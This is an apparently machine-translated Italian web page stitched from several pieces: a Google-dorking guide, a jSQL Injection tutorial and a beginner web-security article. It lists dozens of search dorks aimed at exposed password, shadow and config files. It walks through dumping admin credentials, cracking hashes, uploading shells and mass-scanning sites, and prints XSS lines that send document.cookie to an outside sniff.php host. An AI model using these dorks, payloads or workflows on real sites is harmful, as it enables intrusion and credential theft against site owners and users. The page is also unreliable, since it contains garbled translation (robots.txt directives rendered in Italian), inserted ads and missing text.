Possiamo trovare ciascuno di questi file utilizzando Google, utilizzando inoltre le parole index of o inurl insieme al nome del file nella barra di ricerca: possiamo trovare siti con script vulnerabili, ad esempio:

allinurl:/random_banner/index.cgi

Utilizzando conoscenze aggiuntive, un hacker può sfruttare la vulnerabilità di uno script e utilizzare questa vulnerabilità per forzare lo script a generare qualsiasi file archiviato sul server. Ad esempio, un file di password.

Come proteggersi dall'hacking di Google. 1. Non pubblicare dati importanti sul server WEB.

Anche se hai pubblicato i dati temporaneamente, potresti dimenticartene o qualcuno avrà il tempo di trovare e prendere questi dati prima di cancellarli. Non farlo. Esistono molti altri modi per trasferire dati che li proteggono dal furto.

2. Controlla il tuo sito.

Utilizza i metodi descritti per effettuare ricerche sul tuo sito. Controlla periodicamente il tuo sito per i nuovi metodi che appaiono sul sito http://johnny.ihackstuff.com. Ricorda che se desideri automatizzare le tue azioni, devi ottenere un'autorizzazione speciale da Google. Se leggi attentamente http://www.google.com/terms_of_service.html, verrà visualizzata la frase: Non è possibile inviare query automatizzate di alcun tipo al sistema di Google senza previa autorizzazione esplicita da parte di Google.

3. Potrebbe non essere necessario che Google indicizzi il tuo sito o parte di esso.

Google ti consente di rimuovere un collegamento al tuo sito o parte di esso dal suo database, nonché di rimuovere pagine dalla cache. Inoltre, puoi vietare la ricerca di immagini sul tuo sito, impedire che brevi frammenti di pagine vengano visualizzati nei risultati di ricerca. Tutte le possibilità per eliminare un sito sono descritte nella pagina http://www.google.com/remove.html. Per fare ciò, devi confermare che sei veramente il proprietario di questo sito o inserire tag nella pagina o

4. Utilizza robots.txt

È noto che i motori di ricerca guardano il file robots.txt situato nella root del sito e non indicizzano quelle parti contrassegnate dalla parola Disallow. Puoi usarlo per impedire che parte del sito venga indicizzata. Ad esempio, per evitare che l'intero sito venga indicizzato, crea un file robots.txt contenente due righe:

Agente utente: *
Non consentire: /

Cos'altro succede

Affinché la vita non ti sembri dolcezza, dirò infine che esistono siti che monitorano quelle persone che, utilizzando i metodi sopra descritti, cercano buchi negli script e nei server WEB. Un esempio di tale pagina è

Applicazione.

Un po' dolce. Prova tu stesso alcuni dei seguenti:

1. #mysql dump filetype:sql - cerca i dump del database dati MySQL
2. Rapporto di riepilogo delle vulnerabilità dell'host: mostrerà quali vulnerabilità hanno riscontrato altre persone
3. phpMyAdmin in esecuzione su inurl:main.php: questo forzerà la chiusura del controllo tramite il pannello phpmyadmin
4. non destinato alla distribuzione riservata
5. Variabili del server dell'albero di controllo dei dettagli della richiesta
6. Esecuzione in modalità Bambino
7. Questo rapporto è stato generato da WebLog
8. titolo:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – forse qualcuno ha bisogno dei file di configurazione del firewall? :)
10. titolo:indice.delle finanze.xls – hmm....
11. intitle:Indice delle chat dbconvert.exe – registri chat icq
12.intext:Analisi del traffico di Tobias Oetiker
13. titolo: Statistiche di utilizzo generate da Webalizer
14. titolo:statistiche web statistiche avanzate
15. intitle:index.of ws_ftp.ini – configurazione ws ftp
16. inurl:ipsec.secrets contiene segreti condivisi - chiave segreta - buona scoperta
17. inurl:main.php Benvenuto in phpMyAdmin
18. inurl:server-info Informazioni sul server Apache
19. sito: gradi admin edu
20. ORA-00921: fine inaspettata del comando SQL – recupero dei percorsi
21. titolo:index.di trillian.ini
22. titolo:Indice di pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Indice di .mysql_history
27. intitle:indice di intext:globals.inc
28. titolo:index.degli amministratori.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php nomedbu dbpass
32. inurl:esegui tipofile:ini

  • "Hacking con Google"
  • Centro di formazione "Informzashchita" http://www.itsecurity.ru - un centro specializzato leader nel campo della formazione informazioni di sicurezza(Licenza del Comitato per l'Istruzione di Mosca n. 015470, accreditamento statale n. 004251). L'unico centro di formazione autorizzato per sistemi di sicurezza Internet e Clearswift in Russia e nei paesi della CSI. Centro di formazione autorizzato Microsoft (specializzazione Sicurezza). I programmi di formazione sono coordinati con la Commissione tecnica statale della Russia, l'FSB (FAPSI). Certificati di formazione e documenti statali sulla formazione avanzata.

    La società SoftKey lo è servizio unico per acquirenti, sviluppatori, rivenditori e partner affiliati. Inoltre, questo è uno dei migliori negozi di software online in Russia, Ucraina, Kazakistan, che offre ai clienti una vasta gamma di prodotti, numerosi metodi di pagamento, elaborazione degli ordini rapida (spesso istantanea), monitoraggio del processo di ordine nella sezione personale, vari sconti dal negozio e dai produttori BY.

    Esegui il file scaricato doppio click(Deve avere macchina virtuale ).

    3. Anonimato durante il controllo di un sito per SQL injection
    Configurazione di Tor e Privoxy su Kali Linux

    [Sezione in fase di sviluppo]

    Configurazione di Tor e Privoxy su Windows

    [Sezione in fase di sviluppo]

    Impostazioni proxy in jSQL Injection

    [Sezione in fase di sviluppo]

    4. Controllare il sito per l'SQL injection con jSQL Injection

    Lavorare con il programma è estremamente semplice. Basta inserire l'indirizzo del sito web e premere INVIO.

    Lo screenshot seguente mostra che il sito è vulnerabile a tre tipi di SQL injection (le informazioni su di essi sono indicate nell'angolo in basso a destra). Facendo clic sui nomi delle iniezioni è possibile cambiare il metodo utilizzato:

    Inoltre, i database esistenti ci sono già stati visualizzati.

    È possibile visualizzare il contenuto di ciascuna tabella:

    In genere, la cosa più interessante delle tabelle sono le credenziali dell'amministratore.

    Se sei fortunato e trovi i dati dell'amministratore, è troppo presto per rallegrarti. Devi ancora trovare il pannello di amministrazione dove inserire questi dati.

    5. Cerca i pannelli di amministrazione con jSQL Injection

    Per fare ciò, vai alla scheda successiva. Qui veniamo accolti da un elenco di possibili indirizzi. Puoi selezionare una o più pagine da controllare:

    La comodità sta nel fatto che non è necessario utilizzare altri programmi.

    Sfortunatamente, non sono molti i programmatori imprudenti che memorizzano le password in chiaro. Molto spesso nella riga della password vediamo qualcosa di simile

    8743b52063cd84097a65d1633f5c74f5

    Questo è un pasticcio. Puoi decrittografarlo usando la forza bruta. E... jSQL Injection ha un brute forcer integrato.

    6. Hash di forza bruta utilizzando jSQL Injection

    L'indubbia comodità è che non è necessario cercare altri programmi. È disponibile il supporto per molti degli hash più popolari.

    Questa non è l'opzione migliore. Per diventare un guru nella decodifica degli hash, si consiglia il libro “” in russo.

    Ma, naturalmente, quando non c'è nessun altro programma a portata di mano o non c'è tempo per studiare, jSQL Injection con la sua funzione di forza bruta integrata tornerà molto utile.

    Ci sono impostazioni: puoi impostare quali caratteri sono inclusi nella password, l'intervallo di lunghezza della password.

    7. Operazioni sui file dopo il rilevamento delle iniezioni SQL

    Oltre alle operazioni con i database, lettura e modifica degli stessi, se vengono rilevate iniezioni SQL, è possibile eseguire le seguenti operazioni sui file:

    • leggere i file sul server
    • caricamento di nuovi file sul server
    • caricamento delle shell sul server

    E tutto questo è implementato in jSQL Injection!

    Esistono delle restrizioni: il server SQL deve avere privilegi sui file. Quelli sensati amministratori di sistema sono disabilitati e hanno accesso a file system non riuscirò ad ottenerlo.

    La presenza di privilegi sui file è abbastanza semplice da verificare. Vai a una delle schede (lettura file, creazione di una shell, caricamento di un nuovo file) e prova a eseguire una delle operazioni specificate.

    Un'altra nota molto importante: dobbiamo conoscere l'esatto percorso assoluto del file con cui lavoreremo, altrimenti non funzionerà nulla.

    Guarda lo screenshot seguente:

    Ad ogni tentativo di operare su un file ci viene risposto: No FILE privilegio (nessun privilegio sul file). E qui non si può fare nulla.

    Se invece hai un altro errore:

    Problema durante la scrittura in [nome_directory]

    Ciò significa che hai specificato erroneamente il percorso assoluto in cui vuoi scrivere il file.

    Per indovinare un percorso assoluto, devi almeno sapere sistema operativo su cui è in esecuzione il server. Per fare ciò, passa alla scheda Rete.

    Questa voce (riga Win64) ci dà motivo di supporre che abbiamo a che fare con il sistema operativo Windows:

    Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connessione: Metodo Keep-Alive: HTTP/1.1 200 OK Lunghezza contenuto: 353 Data: venerdì, 11 dicembre 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tipo di contenuto: text/html; set di caratteri=UTF-8

    Qui abbiamo alcuni Unix (*BSD, Linux):

    Codifica trasferimento: Chunked Data: venerdì 11 dicembre 2015 11:57:02 GMT Metodo: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connessione: keep-alive Tipo di contenuto: text/html X- Fornito da: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

    E qui abbiamo CentOS:

    Metodo: HTTP/1.1 200 OK Scadenza: giovedì 19 novembre 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connessione: keep-alive X-Cache-Lookup: MISS da t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS da t1.hoster.ru Controllo cache: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Data: venerdì 11 dicembre 2015 12:08:54 GMT Codifica di trasferimento: Tipo di contenuto in blocchi: text/html; set di caratteri=WINDOWS-1251

    Su Windows, una cartella tipica per i siti è C:\Server\data\htdocs\ . Ma, in effetti, se qualcuno "ha pensato di" creare un server su Windows, allora, molto probabilmente, questa persona non ha sentito nulla sui privilegi. Pertanto, dovresti iniziare a provare direttamente dalla directory C:/Windows/:

    Come puoi vedere, tutto è andato bene la prima volta.

    Ma le stesse shell jSQL Injection sollevano dubbi nella mia mente. Se disponi dei privilegi sui file, puoi caricare facilmente qualcosa con un'interfaccia web.

    8. Controllo in blocco dei siti per iniezioni SQL

    E anche questa funzione è disponibile in jSQL Injection. Tutto è estremamente semplice: scarica un elenco di siti (può essere importato da un file), seleziona quelli che desideri controllare e fai clic sul pulsante appropriato per avviare l'operazione.

    Conclusione da jSQL Injection

    jSQL Injection è uno strumento valido e potente per la ricerca e l'utilizzo delle iniezioni SQL trovate sui siti Web. I suoi indubbi vantaggi: facilità d'uso, funzioni correlate integrate. jSQL Injection può essere il migliore amico dei principianti quando analizza i siti web.

    Tra i difetti noterei l'impossibilità di modificare i database (almeno io non ho trovato questa funzionalità). Come tutti gli strumenti GUI, uno degli svantaggi di questo programma può essere attribuito alla sua incapacità di essere utilizzato negli script. Tuttavia, in questo programma è possibile anche una certa automazione, grazie alla funzione integrata di scansione di massa del sito.

    Il programma jSQL Injection è molto più comodo da usare rispetto a sqlmap. Ma sqlmap supporta più tipi SQL injection, ha opzioni per lavorare con file firewall e alcune altre funzioni.

    In conclusione: jSQL Injection è il migliore amico di un hacker alle prime armi.

    L'aiuto per questo programma nell'Enciclopedia Kali Linux può essere trovato in questa pagina: http://kali.tools/?p=706

    Ho deciso di parlare un po’ della sicurezza delle informazioni. L'articolo sarà utile per i programmatori alle prime armi e per coloro che hanno appena iniziato a impegnarsi nello sviluppo di frontend. Qual è il problema?

    Molti sviluppatori alle prime armi si lasciano così trasportare dalla scrittura del codice da dimenticare completamente la sicurezza del proprio lavoro. E, cosa più importante, dimenticano vulnerabilità come le query SQL e XXS. Inoltre inventano password semplici per i loro pannelli amministrativi e sono sottoposti a forza bruta. Quali sono questi attacchi e come evitarli?

    SQL Injection

    L'SQL injection è il tipo più comune di attacco ad un database, che viene effettuato durante una query SQL per uno specifico DBMS. Molte persone e anche grandi aziende soffrono di tali attacchi. Il motivo è un errore dello sviluppatore durante la scrittura del database e, in senso stretto, delle query SQL.

    Un attacco SQL injection è possibile a causa dell'elaborazione errata dei dati di input utilizzati nelle query SQL. Se l'attacco di un hacker va a buon fine si rischia di perdere non solo il contenuto dei database, ma anche le password e i log del pannello amministrativo. E questi dati saranno sufficienti per assumere completamente il controllo del sito o apportarvi modifiche irreversibili.

    L'attacco può essere riprodotto con successo in script scritti in PHP, ASP, Perl e altri linguaggi. Il successo di tali attacchi dipende maggiormente dal DBMS utilizzato e da come viene implementato lo script stesso. Esistono molti siti vulnerabili alle iniezioni SQL nel mondo. Questo è facile da verificare. Basta inserire "dorks": si tratta di query speciali per la ricerca di siti vulnerabili. Ecco qui alcuni di loro:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:articolo.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:pagina.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:articolo.php?id=

    Come usarli? Basta inserirli in un motore di ricerca Google o Yandex. Il motore di ricerca ti fornirà non solo un sito vulnerabile, ma anche una pagina su questa vulnerabilità. Ma non ci fermeremo qui e non ci assicureremo che la pagina sia davvero vulnerabile. Per fare ciò è sufficiente inserire una virgoletta singola “‘ dopo il valore “id=1”. Qualcosa come questo:

    • inurl:games.php?id=1'

    E il sito ci darà un errore sulla query SQL. Di cosa ha bisogno il nostro hacker dopo?

    E poi ha bisogno proprio di questo collegamento alla pagina di errore. Quindi il lavoro sulla vulnerabilità nella maggior parte dei casi avviene nella distribuzione "Kali linux" con le sue utilità per questa parte: introdurre il codice di iniezione ed eseguire le operazioni necessarie. Come ciò accadrà, non posso dirtelo. Ma puoi trovare informazioni a riguardo su Internet.

    Attacco XSS

    Questo tipo di attacco viene effettuato Biscotti. Gli utenti, a loro volta, adorano salvarli. Perché no? Cosa faremmo senza di loro? Dopotutto, grazie ai cookie, non dobbiamo inserire la password per Vk.com o Mail.ru cento volte. E sono pochi quelli che li rifiutano. Ma su Internet per gli hacker spesso appare una regola: il coefficiente di convenienza è direttamente proporzionale al coefficiente di insicurezza.

    Per implementare un attacco XSS, il nostro hacker ha bisogno della conoscenza di JavaScript. A prima vista, il linguaggio è molto semplice e innocuo, perché non ha accesso alle risorse del computer. Un hacker può lavorare solo con JavaScript in un browser, ma questo è sufficiente. Dopotutto, la cosa principale è inserire il codice nella pagina web.

    Non parlerò in dettaglio del processo di attacco. Ti dirò solo le basi e il significato di come ciò accade.

    Un hacker può aggiungere codice JS ad alcuni forum o libri degli ospiti:

    document.location.href ="http://192.168.1.7/sniff.php?test"

    Gli script ci reindirizzeranno alla pagina infetta, dove verrà eseguito il codice: che si tratti di uno sniffer, di una sorta di archivio o di un exploit, che in qualche modo ruberà i nostri cookie dalla cache.

    Perché JavaScript? Perché JavaScript è ottimo nel gestire le richieste web e ha accesso ai cookie. Ma se il nostro script ci porta su qualche sito, l'utente lo noterà facilmente. Qui l'hacker utilizza un'opzione più astuta: inserisce semplicemente il codice nell'immagine.

    Img=nuova immagine();

    Img.src="http://192.168.1.7/sniff.php?"+document.cookie;

    Creiamo semplicemente un'immagine e le assegniamo il nostro script come indirizzo.

    Come proteggersi da tutto questo? È molto semplice: non fare clic su collegamenti sospetti.

    Attacchi DoS e DDos

    DoS (dall'inglese Denial of Service - negazione del servizio) - attacco hacker su un sistema informatico con l'obiettivo di provocarne il fallimento. Si tratta della creazione di condizioni alle quali gli utenti in buona fede del sistema non possono accedere a quanto fornito risorse di sistema(server), oppure l'accesso è difficile. Un guasto del sistema può anche essere un passo verso la sua acquisizione se, in una situazione di emergenza, il software produce informazioni critiche: ad esempio una versione, parte del codice di un programma, ecc. Ma molto spesso questa è una misura della pressione economica: la perdita di un semplice servizio che genera reddito. Le fatture del fornitore o le misure per evitare un attacco colpiscono notevolmente il “bersaglio” in tasca. Attualmente gli attacchi DoS e DDoS sono i più popolari perché permettono a quasi tutti i sistemi di fallire senza lasciare prove giuridicamente significative.

    Qual è la differenza tra attacco DoS e DDos?

    Il DoS è un attacco progettato in modo intelligente. Ad esempio, se il server non controlla la correttezza dei pacchetti in entrata, un hacker può effettuare una richiesta che impiegherà un'eternità per essere elaborata e non ci sarà abbastanza tempo del processore per funzionare con altre connessioni. Di conseguenza, ai clienti verrà negato il servizio. Ma non sarà possibile sovraccaricare o disabilitare in questo modo siti grandi e famosi. Sono dotati di canali abbastanza ampi e server super potenti in grado di far fronte a tale sovraccarico senza problemi.

    DDoS è in realtà lo stesso attacco di DoS. Ma se in DoS è presente un pacchetto di richiesta, in DDoS possono essercene centinaia o più. Anche i server super potenti potrebbero non essere in grado di far fronte a un tale sovraccarico. Lasciate che vi faccia un esempio.

    Un attacco DoS avviene quando stai conversando con qualcuno, ma poi una persona maleducata si avvicina e inizia a gridare ad alta voce. È impossibile o molto difficile parlare. Soluzione: chiamare la sicurezza, che calmerà e allontanerà la persona dal locale. Gli attacchi DDoS si verificano quando una folla di migliaia di persone così maleducate si precipita dentro. In questo caso la sicurezza non potrà legare tutti e portarli via.

    DoS e DDoS vengono eseguiti da computer, i cosiddetti zombie. Si tratta di computer di utenti hackerati da hacker che non sospettano nemmeno che la loro macchina stia partecipando ad un attacco a qualsiasi server.

    Come proteggersi da questo? In generale, assolutamente no. Ma puoi rendere le cose più difficili per un hacker. Per fare ciò è necessario selezionare buon hosting con server potenti.

    Attacco di forza bruta

    Uno sviluppatore può ideare molti sistemi di protezione dagli attacchi, rivedere completamente gli script che abbiamo scritto, controllare le vulnerabilità del sito, ecc. Ma quando arriva all’ultimo passaggio del layout del sito web, ovvero quando imposta semplicemente una password per il pannello di amministrazione, potrebbe dimenticarsi di una cosa. Parola d'ordine!

    È severamente sconsigliato impostare una password semplice. Potrebbe essere 12345, 1114457, vasya111, ecc. Non è consigliabile impostare password lunghe meno di 10-11 caratteri. Altrimenti potresti essere soggetto all'attacco più comune e semplice: la forza bruta.

    La forza bruta è un attacco di ricerca di password nel dizionario che utilizza programmi speciali. I dizionari possono essere diversi: latino, enumerazione per numeri, diciamo fino a un certo intervallo, misto (latino + numeri), e ci sono anche dizionari con caratteri univoci @#4$%&*~~`’”\ ? eccetera.

    Naturalmente questo tipo di attacco è facile da evitare: basta inventare una password complessa. Anche un captcha può salvarti. Inoltre, se il tuo sito è realizzato su un CMS, molti di essi rilevano questo tipo di attacco e bloccano l'IP. Devi sempre ricordare che più sono diversi i caratteri in una password, più difficile sarà indovinarla.

    Come funzionano gli hacker? Nella maggior parte dei casi sospettano o conoscono in anticipo parte della password. È abbastanza logico supporre che la password dell’utente non sarà certamente composta da 3 o 5 caratteri. Tali password portano a frequenti attacchi di hacking. Fondamentalmente, gli hacker prendono un intervallo compreso tra 5 e 10 caratteri e aggiungono diversi caratteri che potrebbero conoscere in anticipo. Successivamente, vengono generate le password con gli intervalli richiesti. La distribuzione Kali Linux dispone anche di programmi per questi casi. E voilà, l'attacco non durerà più a lungo, poiché il volume del dizionario non è più così grande. Inoltre, un hacker può sfruttare la potenza della scheda video. Alcuni supportano il sistema CUDA e la velocità di ricerca aumenta fino a 10 volte. E ora vediamo che l'attacco è così in modo semplice abbastanza reale. Ma non sono solo i siti web ad essere soggetti alla forza bruta.

    Cari sviluppatori, non dimenticate mai il sistema di sicurezza informatica, perché oggi molte persone, compresi gli stati, soffrono di questo tipo di attacchi. Dopotutto, la più grande vulnerabilità è una persona che può sempre distrarsi da qualche parte o perdersi qualcosa. Siamo programmatori, ma non macchine programmate. Stai sempre in guardia, perché la perdita di informazioni può avere gravi conseguenze!